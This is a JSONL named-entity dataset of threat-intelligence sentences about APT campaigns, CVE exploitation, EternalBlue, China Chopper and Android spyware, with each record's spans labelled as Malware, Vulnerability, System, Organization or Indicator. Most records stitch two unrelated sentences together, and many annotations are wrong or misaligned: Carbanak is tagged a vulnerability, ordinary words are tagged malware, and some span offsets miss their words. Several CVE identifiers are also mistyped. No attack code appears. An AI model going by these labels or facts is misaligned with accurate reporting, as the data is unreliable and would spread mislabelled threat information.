{"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 247, "end": 259, "label": "Organization"}, {"start": 290, "end": 294, "label": "System"}, {"start": 295, "end": 303, "label": "Vulnerability"}, {"start": 304, "end": 311, "label": "Vulnerability"}]}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}, {"start": 262, "end": 267, "label": "System"}, {"start": 268, "end": 276, "label": "Vulnerability"}, {"start": 346, "end": 350, "label": "System"}, {"start": 351, "end": 359, "label": "Vulnerability"}, {"start": 419, "end": 432, "label": "Organization"}, {"start": 445, "end": 473, "label": "Vulnerability"}]}
{"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 119, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 247, "end": 254, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}]}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 315, "end": 328, "label": "Vulnerability"}, {"start": 418, "end": 428, "label": "Organization"}]}
{"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 211, "end": 222, "label": "Vulnerability"}, {"start": 223, "end": 230, "label": "Vulnerability"}, {"start": 270, "end": 277, "label": "System"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 296, "end": 309, "label": "Vulnerability"}]}
{"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . One vulnerability is a Windows zero-day vulnerability ( CVE-2019-0703 ) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 45, "end": 54, "label": "Malware"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 105, "end": 112, "label": "System"}, {"start": 113, "end": 121, "label": "Vulnerability"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 168, "end": 176, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 201, "end": 208, "label": "System"}, {"start": 209, "end": 224, "label": "Vulnerability"}]}
{"text": "The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak .", "spans": [{"start": 27, "end": 40, "label": "Vulnerability"}, {"start": 71, "end": 87, "label": "System"}, {"start": 90, "end": 93, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 246, "end": 253, "label": "System"}, {"start": 361, "end": 368, "label": "Vulnerability"}, {"start": 448, "end": 462, "label": "Organization"}]}
{"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 137, "label": "Malware"}, {"start": 140, "end": 167, "label": "Malware"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 240, "end": 253, "label": "Vulnerability"}, {"start": 318, "end": 332, "label": "Organization"}, {"start": 394, "end": 402, "label": "Organization"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . The zero-day vulnerability found and reported by Symantec CVE-2019-0703 occurs due to the ACT the Windows SMB Server handles certain requests .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 163, "end": 171, "label": "Vulnerability"}, {"start": 208, "end": 216, "label": "Organization"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 257, "end": 264, "label": "System"}]}
{"text": "CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 49, "end": 69, "label": "Malware"}, {"start": 74, "end": 93, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 200, "end": 207, "label": "Vulnerability"}, {"start": 208, "end": 228, "label": "Indicator"}, {"start": 233, "end": 252, "label": "Indicator"}]}
{"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 28, "end": 41, "label": "Vulnerability"}, {"start": 45, "end": 57, "label": "Malware"}, {"start": 65, "end": 68, "label": "System"}, {"start": 88, "end": 101, "label": "Vulnerability"}, {"start": 105, "end": 117, "label": "Indicator"}]}
{"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . At this time , we do not believe that the attackers found a new ASA exploit .", "spans": [{"start": 146, "end": 152, "label": "Malware"}, {"start": 172, "end": 186, "label": "Vulnerability"}, {"start": 190, "end": 203, "label": "Vulnerability"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 270, "end": 273, "label": "System"}, {"start": 274, "end": 281, "label": "Vulnerability"}]}
{"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution ( RCE ) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor .", "spans": [{"start": 52, "end": 61, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 169, "end": 175, "label": "Organization"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 234, "end": 271, "label": "System"}, {"start": 274, "end": 277, "label": "System"}]}
{"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 86, "end": 89, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 279, "end": 285, "label": "Indicator"}, {"start": 305, "end": 319, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}]}
{"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft \u2019s Equation Editor ( EQNEDT32 ) .", "spans": [{"start": 66, "end": 80, "label": "Vulnerability"}, {"start": 147, "end": 161, "label": "Malware"}, {"start": 192, "end": 204, "label": "Malware"}, {"start": 337, "end": 346, "label": "Indicator"}, {"start": 367, "end": 380, "label": "Vulnerability"}, {"start": 398, "end": 407, "label": "Organization"}, {"start": 411, "end": 426, "label": "System"}, {"start": 429, "end": 437, "label": "System"}]}
{"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": [{"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 118, "end": 143, "label": "Malware"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 210, "end": 217, "label": "Organization"}, {"start": 296, "end": 299, "label": "Indicator"}, {"start": 315, "end": 322, "label": "Vulnerability"}, {"start": 327, "end": 340, "label": "Vulnerability"}]}
{"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 228, "end": 242, "label": "Vulnerability"}, {"start": 245, "end": 258, "label": "Vulnerability"}]}
{"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 284, "end": 298, "label": "Vulnerability"}, {"start": 303, "end": 316, "label": "Vulnerability"}, {"start": 323, "end": 333, "label": "Malware"}, {"start": 382, "end": 388, "label": "Organization"}]}
{"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 223, "end": 236, "label": "Organization"}, {"start": 255, "end": 268, "label": "Vulnerability"}, {"start": 278, "end": 292, "label": "Malware"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Organization"}, {"start": 264, "end": 271, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 205, "end": 209, "label": "System"}, {"start": 248, "end": 262, "label": "Vulnerability"}, {"start": 329, "end": 343, "label": "Indicator"}, {"start": 374, "end": 386, "label": "Indicator"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 281, "end": 288, "label": "Vulnerability"}, {"start": 289, "end": 302, "label": "Vulnerability"}, {"start": 320, "end": 345, "label": "Indicator"}, {"start": 348, "end": 362, "label": "Indicator"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 223, "end": 232, "label": "Organization"}, {"start": 249, "end": 256, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}, {"start": 349, "end": 354, "label": "Organization"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . specifically CVE-2018-0798 , before downloading subsequent payloads .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 212, "end": 225, "label": "Vulnerability"}]}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 193, "end": 210, "label": "Organization"}, {"start": 297, "end": 304, "label": "Vulnerability"}, {"start": 309, "end": 324, "label": "Vulnerability"}]}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 190, "end": 197, "label": "Vulnerability"}, {"start": 207, "end": 220, "label": "Vulnerability"}]}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 315, "end": 325, "label": "Organization"}, {"start": 375, "end": 382, "label": "Vulnerability"}, {"start": 390, "end": 396, "label": "System"}, {"start": 415, "end": 429, "label": "Vulnerability"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 232, "end": 242, "label": "Indicator"}, {"start": 391, "end": 398, "label": "Vulnerability"}, {"start": 403, "end": 409, "label": "System"}, {"start": 428, "end": 442, "label": "Vulnerability"}]}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 208, "end": 215, "label": "Vulnerability"}, {"start": 216, "end": 229, "label": "Vulnerability"}, {"start": 258, "end": 271, "label": "Vulnerability"}, {"start": 275, "end": 282, "label": "System"}, {"start": 394, "end": 410, "label": "Vulnerability"}, {"start": 411, "end": 418, "label": "Vulnerability"}]}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 142, "end": 155, "label": "Indicator"}, {"start": 217, "end": 224, "label": "Vulnerability"}, {"start": 248, "end": 255, "label": "Vulnerability"}, {"start": 260, "end": 267, "label": "System"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 300, "end": 313, "label": "Vulnerability"}, {"start": 318, "end": 331, "label": "Vulnerability"}, {"start": 345, "end": 353, "label": "Organization"}]}
{"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 39, "end": 49, "label": "Malware"}, {"start": 149, "end": 160, "label": "Organization"}, {"start": 243, "end": 252, "label": "Organization"}, {"start": 276, "end": 290, "label": "Vulnerability"}, {"start": 302, "end": 315, "label": "Vulnerability"}]}
{"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 19, "end": 45, "label": "Malware"}, {"start": 125, "end": 132, "label": "Indicator"}, {"start": 171, "end": 177, "label": "System"}, {"start": 193, "end": 206, "label": "Vulnerability"}]}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 170, "end": 178, "label": "Indicator"}]}
{"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": [{"start": 34, "end": 45, "label": "Malware"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 241, "end": 247, "label": "System"}, {"start": 290, "end": 297, "label": "Vulnerability"}, {"start": 306, "end": 320, "label": "Vulnerability"}, {"start": 321, "end": 334, "label": "Vulnerability"}]}
{"text": "This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 65, "end": 89, "label": "Malware"}, {"start": 92, "end": 98, "label": "Malware"}, {"start": 101, "end": 107, "label": "Malware"}, {"start": 110, "end": 123, "label": "Malware"}, {"start": 128, "end": 142, "label": "Malware"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 166, "end": 175, "label": "Organization"}]}
{"text": "It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell .", "spans": [{"start": 18, "end": 31, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 102, "end": 116, "label": "Organization"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 163, "end": 172, "label": "Organization"}, {"start": 195, "end": 208, "label": "Vulnerability"}]}
{"text": "With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 .", "spans": [{"start": 24, "end": 35, "label": "Malware"}, {"start": 41, "end": 45, "label": "Malware"}, {"start": 223, "end": 236, "label": "Vulnerability"}]}
{"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks .", "spans": [{"start": 3, "end": 22, "label": "Malware"}, {"start": 25, "end": 36, "label": "Malware"}, {"start": 48, "end": 65, "label": "Malware"}, {"start": 191, "end": 200, "label": "System"}, {"start": 254, "end": 257, "label": "System"}, {"start": 327, "end": 341, "label": "Organization"}]}
{"text": "To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . OSX Malware Linked to Operation Emmental Hijacks User Network Traffic .", "spans": [{"start": 50, "end": 61, "label": "Malware"}, {"start": 84, "end": 91, "label": "Malware"}, {"start": 96, "end": 123, "label": "Malware"}, {"start": 131, "end": 137, "label": "Malware"}, {"start": 160, "end": 163, "label": "System"}, {"start": 164, "end": 171, "label": "Malware"}]}
{"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The OSX_DOK malware ( Detected by Trend Micro as OSX_DOK.C ) showcases sophisticated features such as certificate abuse and security software evasion that affects machines using Apple \u2019s OS X operating system .", "spans": [{"start": 37, "end": 45, "label": "Malware"}, {"start": 57, "end": 67, "label": "Malware"}, {"start": 136, "end": 143, "label": "Malware"}, {"start": 144, "end": 151, "label": "Malware"}, {"start": 166, "end": 177, "label": "Organization"}, {"start": 181, "end": 190, "label": "Malware"}, {"start": 310, "end": 323, "label": "System"}]}
{"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . This malware , which specifically targets Swiss banking users , uses a phishing campaign to drop its payload , which eventually results in the hijacking of a user \u2019s network traffic using a Man-in-the-Middle ( MitM ) attack .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 49, "end": 67, "label": "Malware"}, {"start": 90, "end": 107, "label": "Malware"}, {"start": 155, "end": 162, "label": "Malware"}]}
{"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . OSX_DOK.C seems to be another version of WERDLOD ( Detected by Trend Micro as TROJ_WERDLOD Family ) , which is a malware that was used during the Operation Emmental campaigns\u2014an interesting development that we will tackle further in this blog post .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 61, "end": 67, "label": "Malware"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 83, "end": 96, "label": "Malware"}, {"start": 99, "end": 125, "label": "Malware"}, {"start": 128, "end": 137, "label": "Malware"}, {"start": 169, "end": 176, "label": "Malware"}, {"start": 191, "end": 202, "label": "Organization"}, {"start": 206, "end": 225, "label": "Malware"}]}
{"text": "The PowerShell version of the Trojan also has the ability to get screenshots . OSX_DOK.C first arrives via a phishing email that contains certain files labeled as either .zip or .docx files .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 61, "end": 64, "label": "Malware"}, {"start": 65, "end": 76, "label": "Malware"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 109, "end": 123, "label": "Indicator"}]}
{"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . The sample we analyzed was a purported message from a police inspector in Zurich allegedly claiming to unsuccessfully contact the recipient .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 174, "end": 196, "label": "Malware"}]}
{"text": "BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . The email also comes with two files attached claiming to contain questions for the user : one is a .zip file , which is a fake OS X app , while the other is a .docx file used to target Windows operating systems using WERDLOD .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 43, "end": 50, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 240, "end": 245, "label": "System"}, {"start": 363, "end": 371, "label": "System"}, {"start": 421, "end": 428, "label": "System"}, {"start": 453, "end": 460, "label": "Malware"}]}
{"text": "The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . Both of these samples work as Banking Trojans and provide similar functionalities .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 17, "end": 24, "label": "Malware"}, {"start": 133, "end": 148, "label": "Malware"}]}
{"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Some examples of the files used in the email attachment include the following :", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 58, "end": 65, "label": "Malware"}, {"start": 213, "end": 218, "label": "System"}]}
{"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . Zahlungsinformationen 01.06.2017.zip .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 93, "end": 100, "label": "Malware"}, {"start": 134, "end": 170, "label": "Indicator"}]}
{"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . Zahlungsinformationen digitec.zip .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 9, "end": 21, "label": "Malware"}, {"start": 135, "end": 168, "label": "Indicator"}]}
{"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Dokument 09.06.2017.zip .", "spans": [{"start": 31, "end": 48, "label": "Malware"}, {"start": 61, "end": 69, "label": "Malware"}, {"start": 74, "end": 92, "label": "Malware"}, {"start": 132, "end": 139, "label": "Malware"}, {"start": 142, "end": 165, "label": "Indicator"}]}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Dokument 09.06.2017.docx .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 221, "end": 245, "label": "Indicator"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 06.2017.docx .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 159, "end": 171, "label": "Indicator"}]}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Once the docx file included in the phishing email is clicked , a warning window will pop up .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}]}
{"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . After this , the App Store on the system will be removed , followed by a full screen fake OS X update screen .", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 119, "end": 128, "label": "System"}, {"start": 192, "end": 196, "label": "System"}]}
